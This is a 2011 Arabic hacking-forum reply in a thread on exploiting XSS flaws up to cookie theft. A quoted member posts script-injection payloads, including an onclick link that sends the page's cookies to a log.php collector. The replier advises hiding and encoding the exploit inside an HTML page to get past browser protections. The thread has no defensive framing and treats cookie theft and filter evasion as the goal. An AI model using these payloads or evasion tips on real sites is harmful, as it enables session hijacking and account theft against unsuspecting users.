الموضوع: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
عرض مشاركة واحدة
قديم 08-22-2011, 02:20 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
ZrIqE ViRuS
 
الصورة الرمزية ZrIqE ViRuS
 

 
 
إحصائية العضو





ZrIqE ViRuS غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ZrIqE ViRuS is on a distinguished road
افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

يعطيك الف الف عافيه يا غالي.........


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة mass1993
يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

اممممممممم
هاد السر بهاي الثغره والي محتكرها المحترفين ......!!
بتعرف شغله

انت لازم تضع الاستغلال بداخل صفحه
html
وتشفر الاستغلال
وبعد تشفر صفحه
html
;)
اعملك شويه بحث وصدقني رح تزبط معاك

السبب بانه ما زبط معاك هو المتصفحات الحديثه بتعمل شويه حمايه لها من هاي الثغره
لكن التشفير ما عليه حمايه ......



مشكور يا نوووووور كثير ع تعبك وشرحك
وفقت حبيبي
التوقيع

[CENTER]

كود PHP:
the bad Game
sometimes i help my friend and raise him to the sky
in cloudy day everything has been changed by different way
the most bad thing ever for me is arrogance
insolently he was arrogant to me
he want me trampling his face
and everyone ask him why there is footsteps on your face
my silence means just to give him more chance to correct his problem 

المستخدم غائب حتى
6-9-2011
دعواتكم

 

   

رد مع اقتباس